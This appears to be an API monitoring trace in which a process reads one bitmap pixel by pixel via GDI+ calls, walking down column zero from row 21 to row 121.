[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=21, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=22, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=23, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=24, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=25, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=26, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.848] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.848] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=27, color=0x19eed4) returned 0x0
[0152.848] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=28, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=29, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=30, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=31, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=32, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=33, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.849] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.849] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=34, color=0x19eed4) returned 0x0
[0152.849] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=35, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=36, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=37, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=38, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=39, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=40, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.850] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.850] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=41, color=0x19eed4) returned 0x0
[0152.850] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=42, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=43, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=44, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=45, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=46, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=47, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.851] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.851] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=48, color=0x19eed4) returned 0x0
[0152.851] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=49, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=50, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=51, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=52, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=53, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=54, color=0x19eed4) returned 0x0
[0152.852] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.852] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.852] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=55, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=56, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=57, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=58, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=59, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=60, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=61, color=0x19eed4) returned 0x0
[0152.853] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.853] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.853] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=62, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=63, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=64, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=65, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=66, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=67, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=68, color=0x19eed4) returned 0x0
[0152.854] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.854] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.854] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=69, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=70, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=71, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=72, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=73, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=74, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=75, color=0x19eed4) returned 0x0
[0152.855] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.855] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.855] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=76, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=77, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=78, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=79, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=80, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=81, color=0x19eed4) returned 0x0
[0152.856] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.856] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.856] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=82, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=83, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=84, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=85, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=86, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=87, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=88, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=89, color=0x19eed4) returned 0x0
[0152.857] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.857] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.857] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=90, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=91, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=92, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=93, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=94, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=95, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=96, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=97, color=0x19eed4) returned 0x0
[0152.858] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.858] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.858] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=98, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=99, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=100, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=101, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=102, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=103, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=104, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=105, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.859] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.859] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=106, color=0x19eed4) returned 0x0
[0152.859] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=107, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=108, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=109, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=110, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=111, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=112, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=113, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.860] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.860] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=114, color=0x19eed4) returned 0x0
[0152.860] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=115, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=116, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=117, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=118, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=119, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=120, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=121, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
